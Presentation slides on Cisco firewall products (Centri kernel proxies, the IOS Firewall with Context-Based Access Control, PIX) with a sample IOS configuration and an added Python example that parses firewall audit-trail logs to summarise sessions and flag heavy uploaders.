Figure: at the application layer sit content filtering, authentication, other services and 3rd-party apps (DNS, web, e-mail). In the NT kernel the kernel proxy sits alongside the Microsoft TCP/IP stack, which is reached through a virtual interface (10.0.0.2). Below them the device driver serves the outside interface (192.204.18.2) and the inside interface (10.0.0.1).

Kernel Proxy: Sample Inbound Data Flow

Figure: in application space, Centri agents (e.g., authentication) and Winsock applications (e.g., web, DNS, mail servers) run on top of Winsock. In kernel space, the Security Verification Engine and Interceptor sit between an external protocol stack (untrusted network adapter, 205.50.50.2) and an internal protocol stack (trusted network adapter, 10.0.0.1); the native Microsoft NT TCP/IP stack attaches through the Centri virtual adapter (10.0.0.2, the trusted server) and talks to the proxies over a local communication channel. The slide traces inbound data through this layout.

Kernel Proxy: Sample Native Stack Data Flow

Figure: same layout as the previous slide (Centri agents and Winsock applications over Winsock in application space; Security Verification Engine and Interceptor, external and internal protocol stacks, untrusted adapter 205.50.50.2, trusted adapter 10.0.0.1, Centri virtual adapter 10.0.0.2 and the local communication channel in kernel space), this time tracing data that flows to the native Microsoft NT TCP/IP stack.

Site-Based Model

Policy enforcement occurs when information passes between sites (intersite), not within the same site (intrasite). Rules are checked when information leaves one site for another.

Figure: policy rules are checked between the Trusted site, the Internet and an Isolated Service Network.

Install creates two sites, Trusted and Internet, which may be expanded upon post-install (e.g. adding an isolated service network [DMZ]). The local stack is tied by a virtual wire to a trusted site.

Eight Kernel Proxies

IP: source/destination checks, ping-of-death prevention, IP spoof prevention
ICMP: message type
TCP: port check, SYN flood prevention
UDP: port check
FTP: inline user authentication, non-transparent proxy mode, allowed action checks
Telnet: inline user authentication, non-transparent proxy mode, port check
HTTP: inline user authentication, URL filtering, Java/ActiveX/JavaScript blocking, allowed action checks
SMTP: nested routing blocking, minimal protocol set, similar to Mail Guard

Centri Summary

High-performance kernel proxy firewall
Uses four breakthroughs in firewall user interface design:
  Natural network views
  Bundled applications
  Policy builder
  Drag-and-drop policy deployment
Integrates well into the Microsoft environment
Policies based on NT domains, groups, and users

Cisco IOS

Integrated security is not a new concept
Existing Cisco IOS security technologies support:
  Perimeter security and access control
  Identification and user authentication
  Denial of service (DoS) protection
  Virtual private networking
  Reporting

Existing Cisco IOS Perimeter Security Technologies

Access control lists
Network address translation (NAT)
VPN technologies: authentication, network-layer encryption, tunneling (GRE, L2F), peer router
Policy-based multi-interface support
Event logging
TACACS+/RADIUS authentication
Lock-and-key security

Cisco IOS Firewall Feature Set

Enhanced security for the intelligent Internet
Context-Based Access Control (CBAC)
  Secure, per-application filtering
  Support for advanced protocols (H.323, SQLnet, RealAudio, etc.)
Control downloading of Java applets
Denial of service detection and prevention
Real-time alerts
TCP/UDP transaction log
Configuration and management

Benefits...

Integrated solution: access and security
No new hardware required: one box to manage
Full routing functionality
Applicable for Internet, intranet and extranet security
Full Cisco IOS software interoperability: customers can leverage their knowledge of Cisco IOS software
Low cost of implementation and ownership for the Cisco installed base

Context-Based Access Control (CBAC)

Tracks state and context of network connections to secure traffic flow
Inspects data coming into or leaving the router
Allows connections to be established by temporarily opening ports based on payload inspection
Return packets are authorized for the particular connection only, via a temporary ACL

Context-Based Access Control (CBAC) Application Support

Transparent support for common TCP/UDP Internet services, including WWW, Telnet, SNMP, finger, etc.
FTP
TFTP
Multimedia applications:
  VDOnet's VDO Live
  RealNetworks RealAudio
  Intel's Internet Video Phone (H.323)
  Microsoft's NetMeeting (H.323)
  Xing Technologies Streamworks
  White Pine's CU-SeeMe
SMTP
Java blocking
BSD R-cmds
Oracle SQL*Net
Remote-procedure call (RPC)

IOS Firewall Transaction Log

Provides audit trail for tracking transactions
Recognition of session and port
Information is sortable via tag
Sample:
Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33192) sent 22 bytes responder (172.166.129.11:25) sent 208 bytes
Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33194) sent 336 bytes responder (172.166.129.11:25) sent 325 bytes
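An added example (not Cisco's): parsing the audit-trail messages above and aggregating them per initiator host and per service, with a simple upload check on top. The first two sample lines are the slide's; the other two lines and the thresholds in find_uploaders are constructed.

```python
import re
from collections import defaultdict

AUDIT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<seq>\d+): "
    r"%FW-6-SESS_AUDIT_TRAIL: (?P<proto>\w+) session initiator "
    r"\((?P<src>[\d.]+):(?P<sport>\d+)\) sent (?P<sent>\d+) bytes "
    r"(?:-- )?responder \((?P<dst>[\d.]+):(?P<dport>\d+)\) sent (?P<rcvd>\d+) bytes$"
)

SAMPLE_LOG = [
    # the two lines shown on the slide
    "Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator "
    "(172.166.1.13:33192) sent 22 bytes responder (172.166.129.11:25) sent 208 bytes",
    "Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator "
    "(172.166.1.13:33194) sent 336 bytes responder (172.166.129.11:25) sent 325 bytes",
    # constructed: a large outbound transfer, written with a '--' separator variant
    "Sep 10 13:09:01 sifi-5 126: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator "
    "(172.166.1.20:1031) sent 51200 bytes -- responder (198.51.100.9:80) sent 600 bytes",
    # constructed: an unrelated syslog line the parser must skip
    "Sep 10 13:09:05 sifi-5 127: %SYS-5-CONFIG_I: Configured from console by vty0",
]


def parse_audit_line(line):
    """Return the session record as a dict, or None if the line is not an audit-trail message."""
    m = AUDIT_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    for k in ("seq", "sport", "dport", "sent", "rcvd"):
        rec[k] = int(rec[k])
    return rec


def summarize(lines):
    """Aggregate sessions and byte counts per initiator host and per (proto, responder port)."""
    by_initiator = defaultdict(lambda: {"sessions": 0, "sent": 0, "rcvd": 0})
    by_service = defaultdict(lambda: {"sessions": 0, "sent": 0, "rcvd": 0})
    unparsed = 0
    for line in lines:
        rec = parse_audit_line(line)
        if rec is None:
            unparsed += 1
            continue
        for bucket in (by_initiator[rec["src"]], by_service[(rec["proto"], rec["dport"])]):
            bucket["sessions"] += 1
            bucket["sent"] += rec["sent"]
            bucket["rcvd"] += rec["rcvd"]
    return {"by_initiator": dict(by_initiator), "by_service": dict(by_service),
            "unparsed": unparsed}


def find_uploaders(lines, min_bytes=10000, ratio=10):
    """Initiators that pushed at least min_bytes out and sent ratio times more than they
    received; both thresholds are constructed for the example and must be tuned per site."""
    hits = []
    for src, b in summarize(lines)["by_initiator"].items():
        if b["sent"] >= min_bytes and b["sent"] > ratio * max(b["rcvd"], 1):
            hits.append(src)
    return sorted(hits)
```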

Sample Configuration

ip inspect name pri-net tcp
ip inspect name pri-net udp
ip inspect name pri-net ftp
ip inspect name pri-net h323
ip inspect name pri-net realaudio
ip inspect name pri-net streamworks
ip inspect name pri-net vdolive
ip inspect name pri-net cuseeme
ip inspect name pri-net http java-list 10
interface e0
 ip inspect pri-net in
 ip access-group 101 out
access-list 10 permit 172.34.7.130
access-list 101 deny ip any any

CFMI

Common security management for enterprise infrastructure
Centralized visual policy development, management, and enforcement
Adaptive configuration of network infrastructure
Integrate existing and future authentication technologies and Cisco firewall technologies
Support for scalable configuration of IPSec and IKE technologies
Physical network representation

Cisco's Firewall Family

Cisco IOS Firewall feature set
Advanced, rich security option for Cisco IOS software, with full routing and WAN access capabilities, that integrates seamlessly with existing Cisco IOS software-based environments

Centri Firewall
High-performance, flexible, Windows NT-based security software with intuitive user-based policy rules. Easy to install, configure, and manage

PIX Firewall
Highest-performance, scalable, dedicated security appliance with the most advanced features and application support, and fault tolerance

References

www.cisco.com/univercd/cc/td/doc/product/software/ios112/112cg_cr/2cbook/2cacclst.htm
Describes access lists and lock-and-key

www.cisco.com/warp/public/701/31.html
Increasing security on IP networks

www.cisco.com/warp/public/707/4.html
Strategies to protect against TCP SYN DoS attacks

www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/113t/113t_3/firewall.htm
Cisco IOS Firewall feature set docs

www.cisco.com/warp/public/458/41.html
NAT FAQ